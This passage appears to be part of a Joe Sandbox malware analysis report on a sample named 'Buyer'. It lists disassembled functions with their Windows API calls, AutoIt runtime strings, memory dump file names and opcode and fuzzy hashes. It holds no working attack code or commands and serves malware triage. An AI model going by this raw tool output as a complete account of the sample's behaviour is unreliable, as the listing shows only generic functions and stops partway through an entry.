                                                                                                    Function 00FAC35F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FAC3FE
                                                                                                    • IsMenu.USER32(00000000), ref: 00FAC41E
                                                                                                    • CreatePopupMenu.USER32 ref: 00FAC454
                                                                                                    • GetMenuItemCount.USER32(01076358), ref: 00FAC4A5
                                                                                                    • InsertMenuItemW.USER32(01076358,?,00000001,00000030), ref: 00FAC4CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2
                                                                                                    • API String ID: 93392585-3793063076
                                                                                                    • Opcode ID: ee07a95bd7260d1b8851b27f6e8297993c3ba26a0a6ecc393c33cff304967504
                                                                                                    • Instruction ID: 0182756c3bb7f7bf4a403d7df03e56b0e5bfd7f942c9edcf292a62738b4525a4
                                                                                                    • Opcode Fuzzy Hash: ee07a95bd7260d1b8851b27f6e8297993c3ba26a0a6ecc393c33cff304967504
                                                                                                    • Instruction Fuzzy Hash: BD51D1B1A012059BDF20CF78D894BBEBBF5AF4A324F14411AE905EB291D7709840EBA5
                                                                                                    Function 00FACE59 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00FACEF8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoad
                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                    • API String ID: 2457776203-404129466
                                                                                                    • Opcode ID: 2ce09c35a9d4ecf3e0a322869934fb772b1346bda21889b2671566c6276c4b33
                                                                                                    • Instruction ID: 48ed776b01ff5f6914e197c167625550ce868d8decc8a34db9a97bd409e77321
                                                                                                    • Opcode Fuzzy Hash: 2ce09c35a9d4ecf3e0a322869934fb772b1346bda21889b2671566c6276c4b33
                                                                                                    • Instruction Fuzzy Hash: 0A112772A49306BEE7025A159CC2DBF73AC9F067B0F20002AF544AA182EBB87D0061F5
                                                                                                    Function 00FAE468 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                    • String ID: 0.0.0.0
                                                                                                    • API String ID: 642191829-3771769585
                                                                                                    • Opcode ID: eeeb1bbc6f3b31b368d874ab42c4f2dd5fbfa837062c257924f23339f57ab83c
                                                                                                    • Instruction ID: 3ca8266a8e4a8d71d1a73e69826729f83971680a5bed7a663c9c2cadce3a4c26
                                                                                                    • Opcode Fuzzy Hash: eeeb1bbc6f3b31b368d874ab42c4f2dd5fbfa837062c257924f23339f57ab83c
                                                                                                    • Instruction Fuzzy Hash: 9C11D6B2D00118AFCB20BB70EC4AEEE77ACDF46724F0401A6F545D6091EF749A81FA61
                                                                                                    Function 00F9E63C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00F9E647
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F9E659
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F9E67F
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00F9E696
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                    • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                                    • API String ID: 582185067-2904798639
                                                                                                    • Opcode ID: f481e6a6bd0f473d5fa483bf912778fc4a9a8420952efe5ba8c011dad2819059
                                                                                                    • Instruction ID: 034b448770dc46601f1cb08ba21283f2f3973a6cbb42163a599676c6a416f40e
                                                                                                    • Opcode Fuzzy Hash: f481e6a6bd0f473d5fa483bf912778fc4a9a8420952efe5ba8c011dad2819059
                                                                                                    • Instruction Fuzzy Hash: 39F0E232C12626ABFB65DB308C48A6A3729BF15B09F0A0156F902E6151EB30DE08FF51
                                                                                                    Function 00FDA672 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00FDA6B3
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00FDA6D3
                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00FDA910
                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FDA92E
                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FDA94F
                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00FDA96E
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDA993
                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00FDA9B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1211466189-0
                                                                                                    • Opcode ID: 609bce8e73cfe236511a73b3696bb1ad80fb0bb5cc648da9f4e4baf29961e07b
                                                                                                    • Instruction ID: a28f2fb5e5c22d81eaf208bcdbfa3880af1244acb749c87717ba19868f7cc03a
                                                                                                    • Opcode Fuzzy Hash: 609bce8e73cfe236511a73b3696bb1ad80fb0bb5cc648da9f4e4baf29961e07b
                                                                                                    • Instruction Fuzzy Hash: 4EB1CD31A00219DFDF14CF28C9957AE7BB2FF44711F09806AEC899B395D734A940EB66
                                                                                                    Function 00FAF35A Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 952045576-0
                                                                                                    • Opcode ID: 9c97900843e819aab37773ef877de8a197180ce65c40ed46dc1890687c993d5b
                                                                                                    • Instruction ID: 227309bd2f7f3b448b7ea63f300c777f0c86a399e9b19aa3442e90a025f4c048
                                                                                                    • Opcode Fuzzy Hash: 9c97900843e819aab37773ef877de8a197180ce65c40ed46dc1890687c993d5b
                                                                                                    • Instruction Fuzzy Hash: 7E41B3A5D1151476CB11EBF8CC46ACFB7BCAF06310F508462EA08E7221FB39E255D7A5
                                                                                                    Function 00F5F596 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F5F611
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F9F980
                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00F9FA03
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 91de0149d65d5e50c767291e481f64d0eaf4bd009cce862584550b81d90c8c3f
                                                                                                    • Instruction ID: 4bba4036567019aa5c63869863fddd5d4d2b1e0ed11733c5c3bd1047edc12cb7
                                                                                                    • Opcode Fuzzy Hash: 91de0149d65d5e50c767291e481f64d0eaf4bd009cce862584550b81d90c8c3f
                                                                                                    • Instruction Fuzzy Hash: D6411A71E05680AADB399B39CC8C76A7B92AB45322F1444ADFA87C6574C635A88CF710
                                                                                                    Function 00FD34C1 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD34D9
                                                                                                    • GetDC.USER32(00000000), ref: 00FD34E1
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FD34EC
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FD34F8
                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FD3534
                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FD3545
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FD6225,?,?,000000FF,00000000,?,000000FF,?), ref: 00FD3580
                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FD359F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864802216-0
                                                                                                    • Opcode ID: c3324c8961a8738512f199b7c5a0f49c97127967a79c822b37cc5198f6b28242
                                                                                                    • Instruction ID: 03bdc1dafd08828af1e15e07670630d1c166289fedd517025bfeafe7aa56ed22
                                                                                                    • Opcode Fuzzy Hash: c3324c8961a8738512f199b7c5a0f49c97127967a79c822b37cc5198f6b28242
                                                                                                    • Instruction Fuzzy Hash: 6331A072201218BFEB118F24DC49FEB3BAEEF49761F084056FE08DA291D6759D41DBA4
                                                                                                    Function 00FC5735 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                    • API String ID: 0-572801152
                                                                                                    • Opcode ID: 2216642838ae050b348d22130b82615d468d6d2535dcb7a1edf3714ae8171292
                                                                                                    • Instruction ID: 2c644003f5a81df3edaaa3021e392fdcc72c2724d48f218d033ae058de7ae251
                                                                                                    • Opcode Fuzzy Hash: 2216642838ae050b348d22130b82615d468d6d2535dcb7a1edf3714ae8171292
                                                                                                    • Instruction Fuzzy Hash: CFD19F71E0060A9FDB10DFA8C982FAEB7B5BF48714F14816DE915AB280E770ED85DB50
                                                                                                    Function 00F81872 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F8191E
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F819A1
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F81B4B,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81A34
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81A4B
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F81B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F81AC7
                                                                                                    • __freea.LIBCMT ref: 00F81AF2
                                                                                                    • __freea.LIBCMT ref: 00F81AFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829977744-0
                                                                                                    • Opcode ID: 12492e4a4ada97b7679d4b685e0e6e10151701b51ae3f43ee58350043c5c9771
                                                                                                    • Instruction ID: f8dd2e9b9eabff07d78e7223dcf027785734d550f7e6db92e756bd4d3f9c4cb5
                                                                                                    • Opcode Fuzzy Hash: 12492e4a4ada97b7679d4b685e0e6e10151701b51ae3f43ee58350043c5c9771
                                                                                                    • Instruction Fuzzy Hash: AC919372E012169AEF25AFA4CC91AEE7BADBF09320F144759E805E7140DB39DD42E760
                                                                                                    Function 00FC4CAA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit
                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                    • API String ID: 2610073882-625585964
                                                                                                    • Opcode ID: cd364cc3ebe8773c5d0ba4404db03efdc93fdb7e39c3799b8fe42bdb1e3ecb20
                                                                                                    • Instruction ID: d38730695b7438f4493f9127f419e5bc4132abba4c2624fff8073ffadd11a58d
                                                                                                    • Opcode Fuzzy Hash: cd364cc3ebe8773c5d0ba4404db03efdc93fdb7e39c3799b8fe42bdb1e3ecb20
                                                                                                    • Instruction Fuzzy Hash: F0919A71E0021AABDF20CFA5C959FAEBBB8BF45724F10815DF515AB280D770A944DBA0
                                                                                                    Function 00F596C0 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 6df9268d8b1928f3a4ff29e49f4cf3ed85ae890597397d60bf489afaf636e82c
                                                                                                    • Instruction ID: 0b2215e83c4b1f052159dee9a3c225777465e9a780875b0d61781b5888dcaa71
                                                                                                    • Opcode Fuzzy Hash: 6df9268d8b1928f3a4ff29e49f4cf3ed85ae890597397d60bf489afaf636e82c
                                                                                                    • Instruction Fuzzy Hash: 61915971D04219EFCB14CFA9CC88AEEBBB9FF49320F148146E915B7251D3B8A945DB60
                                                                                                    Function 00FB1870 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00FB1945
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FB196D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00FB1991
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB19C1
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1A48
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1AAD
                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00FB1B19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                    • String ID:
                                                                                                    • API String ID: 2550207440-0
                                                                                                    • Opcode ID: 196ac5f85f18a0989fa13eaec16c0068125f7b3c329750c0d00dfcf8fde3c769
                                                                                                    • Instruction ID: 964bfc7747cc630d7e7cfe591163f19913ef35bca3cf8a1ce3e857e1e0775728
                                                                                                    • Opcode Fuzzy Hash: 196ac5f85f18a0989fa13eaec16c0068125f7b3c329750c0d00dfcf8fde3c769
                                                                                                    • Instruction Fuzzy Hash: E891E276A00209AFDB01DFA9C8A4BFEB7B8FF45321F548015E911E7291D778A941EF90
                                                                                                    Function 00FC40CE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FC40F2
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FC4201
                                                                                                    • _wcslen.LIBCMT ref: 00FC4211
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FC43A6
                                                                                                      • Part of subcall function 00FB13C8: VariantInit.OLEAUT32(00000000), ref: 00FB1408
                                                                                                      • Part of subcall function 00FB13C8: VariantCopy.OLEAUT32(?,?), ref: 00FB1411
                                                                                                      • Part of subcall function 00FB13C8: VariantClear.OLEAUT32(?), ref: 00FB141D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                    • Opcode ID: c4115c1bb66af7c7c2357df5710011c4d85415ecb1af3483912847c6326e4bd1
                                                                                                    • Instruction ID: 08a41e3705bb695c1cf560887ad07b4b9f7c9e4139311d523973adf1393902c1
                                                                                                    • Opcode Fuzzy Hash: c4115c1bb66af7c7c2357df5710011c4d85415ecb1af3483912847c6326e4bd1
                                                                                                    • Instruction Fuzzy Hash: 81919C75A083029FC700EF64C991A6ABBE5FF89314F14892DF89987351DB34ED45EB82
                                                                                                    Function 00FC5334 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA0695: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?,?,00FA09E5), ref: 00FA06B2
